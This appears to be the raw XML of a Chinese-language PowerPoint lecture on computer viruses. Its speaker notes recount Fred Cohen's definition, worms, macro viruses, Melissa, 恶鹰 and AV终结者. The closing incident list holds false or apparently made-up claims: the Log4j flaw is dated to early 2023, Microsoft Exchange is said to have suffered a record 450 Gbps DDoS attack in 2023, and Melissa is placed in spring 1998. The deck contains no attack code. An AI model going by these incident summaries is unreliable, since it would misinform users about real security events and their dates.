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xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide4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9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide50.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide51.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag1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1"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="752" r:id="rId4"/>
    <p:sldId id="749" r:id="rId5"/>
    <p:sldId id="750" r:id="rId6"/>
    <p:sldId id="751" r:id="rId7"/>
    <p:sldId id="911" r:id="rId8"/>
    <p:sldId id="912" r:id="rId9"/>
    <p:sldId id="913" r:id="rId10"/>
    <p:sldId id="914" r:id="rId11"/>
    <p:sldId id="915" r:id="rId12"/>
    <p:sldId id="916" r:id="rId13"/>
    <p:sldId id="917" r:id="rId14"/>
    <p:sldId id="918" r:id="rId15"/>
    <p:sldId id="919" r:id="rId16"/>
    <p:sldId id="920" r:id="rId17"/>
    <p:sldId id="304" r:id="rId18"/>
    <p:sldId id="271" r:id="rId19"/>
    <p:sldId id="261" r:id="rId20"/>
    <p:sldId id="550" r:id="rId21"/>
    <p:sldId id="551" r:id="rId22"/>
    <p:sldId id="549" r:id="rId23"/>
    <p:sldId id="298" r:id="rId24"/>
    <p:sldId id="270" r:id="rId25"/>
    <p:sldId id="260" r:id="rId26"/>
    <p:sldId id="380" r:id="rId27"/>
    <p:sldId id="292" r:id="rId28"/>
    <p:sldId id="313" r:id="rId29"/>
    <p:sldId id="293" r:id="rId30"/>
    <p:sldId id="305" r:id="rId31"/>
    <p:sldId id="307" r:id="rId32"/>
    <p:sldId id="312" r:id="rId33"/>
    <p:sldId id="308" r:id="rId34"/>
    <p:sldId id="309" r:id="rId35"/>
    <p:sldId id="840" r:id="rId36"/>
    <p:sldId id="448" r:id="rId37"/>
    <p:sldId id="295" r:id="rId38"/>
    <p:sldId id="379" r:id="rId39"/>
    <p:sldId id="291" r:id="rId40"/>
    <p:sldId id="262" r:id="rId41"/>
    <p:sldId id="263" r:id="rId42"/>
    <p:sldId id="264" r:id="rId43"/>
    <p:sldId id="290" r:id="rId44"/>
    <p:sldId id="286" r:id="rId45"/>
    <p:sldId id="365" r:id="rId46"/>
    <p:sldId id="267" r:id="rId47"/>
    <p:sldId id="283" r:id="rId48"/>
    <p:sldId id="284" r:id="rId49"/>
    <p:sldId id="285" r:id="rId50"/>
    <p:sldId id="299" r:id="rId51"/>
    <p:sldId id="300" r:id="rId52"/>
    <p:sldId id="366" r:id="rId53"/>
    <p:sldId id="385" r:id="rId54"/>
    <p:sldId id="278" r:id="rId55"/>
    <p:sldId id="350" r:id="rId56"/>
    <p:sldId id="370" r:id="rId57"/>
    <p:sldId id="371" r:id="rId58"/>
    <p:sldId id="367" r:id="rId59"/>
    <p:sldId id="510" r:id="rId60"/>
    <p:sldId id="369" r:id="rId61"/>
    <p:sldId id="374" r:id="rId62"/>
    <p:sldId id="377" r:id="rId63"/>
    <p:sldId id="376" r:id="rId64"/>
    <p:sldId id="372" r:id="rId65"/>
    <p:sldId id="381" r:id="rId66"/>
    <p:sldId id="686" r:id="rId67"/>
    <p:sldId id="648" r:id="rId68"/>
    <p:sldId id="649" r:id="rId69"/>
    <p:sldId id="685" r:id="rId70"/>
    <p:sldId id="303" r:id="rId71"/>
    <p:sldId id="279" r:id="rId72"/>
    <p:sldId id="287" r:id="rId73"/>
    <p:sldId id="280" r:id="rId74"/>
    <p:sldId id="288" r:id="rId75"/>
    <p:sldId id="289" r:id="rId76"/>
    <p:sldId id="511" r:id="rId77"/>
    <p:sldId id="281" r:id="rId78"/>
    <p:sldId id="387" r:id="rId79"/>
    <p:sldId id="508" r:id="rId80"/>
    <p:sldId id="388" r:id="rId81"/>
    <p:sldId id="389" r:id="rId82"/>
    <p:sldId id="395" r:id="rId83"/>
    <p:sldId id="390" r:id="rId84"/>
    <p:sldId id="394" r:id="rId85"/>
    <p:sldId id="397" r:id="rId86"/>
    <p:sldId id="399" r:id="rId87"/>
    <p:sldId id="382" r:id="rId88"/>
    <p:sldId id="403" r:id="rId89"/>
    <p:sldId id="391" r:id="rId90"/>
    <p:sldId id="392" r:id="rId91"/>
    <p:sldId id="841" r:id="rId92"/>
    <p:sldId id="314" r:id="rId93"/>
    <p:sldId id="844" r:id="rId94"/>
    <p:sldId id="842" r:id="rId95"/>
    <p:sldId id="843" r:id="rId96"/>
    <p:sldId id="846" r:id="rId97"/>
    <p:sldId id="922" r:id="rId98"/>
    <p:sldId id="921" r:id="rId99"/>
    <p:sldId id="845" r:id="rId100"/>
    <p:sldId id="923" r:id="rId101"/>
    <p:sldId id="924" r:id="rId102"/>
    <p:sldId id="925" r:id="rId103"/>
    <p:sldId id="400" r:id="rId104"/>
    <p:sldId id="282" r:id="rId105"/>
    <p:sldId id="384" r:id="rId106"/>
    <p:sldId id="375" r:id="rId107"/>
    <p:sldId id="301" r:id="rId108"/>
    <p:sldId id="302" r:id="rId109"/>
    <p:sldId id="269" r:id="rId110"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId1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2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3" autoAdjust="0"/>
    <p:restoredTop sz="78890"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="89" d="100"/>
          <a:sy n="89" d="100"/>
        </p:scale>
        <p:origin x="18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gs" Target="tags/tag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https://new.qq.com/rain/a/20220315A0AKJA00.html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https://new.qq.com/rain/a/20220315A0AKJA00.html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https://new.qq.com/rain/a/20220315A0AKJA00.html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https://new.qq.com/rain/a/20220315A0AKJA00.html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https://view.inews.qq.com/a/20220908A039MN00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https://www.antpedia.com/news/74/n-2822574.html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https://view.inews.qq.com/a/20220908A039MN00</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https://wenku.baidu.com/view/784d218432d4b14e852458fb770bf78a64293a4d.html#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“计算机病毒之父”弗雷德•科恩给计算机病毒正名：“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>计算机病毒不是利用操作系统的错误或缺陷的程序，它是正常的用户程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。”</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>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最初的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>蠕虫病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>定义是因为在DOS环境下，病毒发作时会在屏幕上出现一条类似虫子的东西，胡乱吞吃屏幕上的字母并将其改形。蠕虫病毒是自包含的程序（或是一套程序），它能传播自身功能的拷贝或自身的某些部分到其他的计算机系统中（通常是经过网络连接）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>宏病毒（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Macro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：寄存在文档或模板的宏中的计算机病毒，一旦被执行，就转移到计算机上，并驻留在Normal模板上，导致文件删除、修改、传输泄露等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>史密斯把它命名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>梅丽莎</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（Melissa），佛罗里达州的一位舞女的名字</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>梅丽莎病毒，是1998年春天，由美国人大卫·L·史密斯运用Word的宏运算编写出的一个电脑病毒，其主要是通过邮件传播。邮件的标题通常为“这是给你的资料，不要让任何人看见”。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>梅丽莎病毒一般通过邮件传播，邮件的标题通常为“这是给你的资料，不要让任何人看见”。一旦收件人打开邮件，病毒就会自动向用户通讯录的前50位好友复制发送同样的邮件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>尽管这种病毒不会删除电脑系统文件，但它引发的大量电子邮件会阻塞电子邮件服务器，使之瘫痪。1999年4月1日，在美国在线的协助下，美国政府将史密斯捉拿归案。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2002年5月7日美国联邦法院日前判决这个病毒的制造者入狱20个月和附加处罚，这是美国第一次对重要的电脑病毒制造者进行严厉惩罚。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在5月1日的联邦法庭上，控辩双方均认定“梅丽莎”病毒造成的损失超过8000万美元，编制这个病毒史密斯也承认，设计电脑病毒是一个“巨大的错误”，自己的行为“不道德 ”。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>2004年1月19日，瑞星全球反病毒监测网在国内率先截获一个恶性蠕虫病毒，并命名为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>恶鹰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>”。该病毒通过邮件传播，邮件主题为“HI”，邮件附件为.exe类型文件。瑞星反病毒工程师分析，恶鹰病毒会大量消耗被感染计算机的资源，同时大量发送病毒邮件，造成网络阻塞。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>AV终结者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>”即“帕虫”是一系列反击杀毒软件，破坏系统安全模式、植入木马下载器的病毒，它指的是一批具备如下破坏性的病毒、木马和蠕虫。“AV终结者”名称中的“AV”即为英文“反病毒”(Anti-Virus)的缩写。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>AV终结者集流行的病毒技术于一身，破坏过程经过了严密的“策划”，首先摧毁用户电脑的安全防御体系，之后“AV终结者”自动连接到指定的网站，大量下载各类木马病毒，盗号木马、广告木马、风险程序接踵而来，使用户的网银、网游、QQ账号密码以及隐私文件都处于极度危险之中。</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最初的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>蠕虫病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>定义是因为在DOS环境下，病毒发作时会在屏幕上出现一条类似虫子的东西，胡乱吞吃屏幕上的字母并将其改形。蠕虫病毒是自包含的程序（或是一套程序），它能传播自身功能的拷贝或自身的某些部分到其他的计算机系统中（通常是经过网络连接）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>宏病毒（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Macro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：寄存在文档或模板的宏中的计算机病毒，一旦被执行，就转移到计算机上，并驻留在Normal模板上，导致文件删除、修改、传输泄露等。</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恶意代码攻击是信息战、网络战最重要的入侵手段之一。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>https://wenku.baidu.com/view/784d218432d4b14e852458fb770bf78a64293a4d.html#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>https://max.book118.com/html/2017/0629/119037284.shtm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“计算机病毒之父”弗雷德•科恩给计算机病毒正名：“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>计算机病毒不是利用操作系统的错误或缺陷的程序，它是正常的用户程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Log4j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>漏洞：让全球网络面临威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>年初，该漏洞允许黑客通过阅读日志文件中的特定字符串来执行恶意代码。这意味着，黑客能够控制受影响的系统，并进行各种恶意操作，如数据窃取、网络攻击等。这个漏洞的影响范围非常广泛，从个人电脑到大型企业服务器，都有可能受到威胁。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Zoom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>视频会议软件：摄像头和麦克风被黑客控制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>年，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Zoom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>视频会议软件曝出了安全漏洞。黑客可以通过漏洞控制用户的摄像头和麦克风，窃取用户的隐私信息，甚至在视频会议中实施网络攻击。这个漏洞的影响范围非常广泛，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Zoom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的用户都可能受到威胁。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Microsoft Exchange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>服务器：邮件服务遭受史上最大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>年，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Microsoft Exchange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>服务器遭受了史上最大的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻击。黑客利用服务器中的安全漏洞，发起了高达</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>450 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Gbps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的攻击，导致许多企业的邮件服务瘫痪。这个漏洞的影响范围非常广泛，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Microsoft Exchange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E1F24"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>服务的企业都可能受到威胁。</a:t>
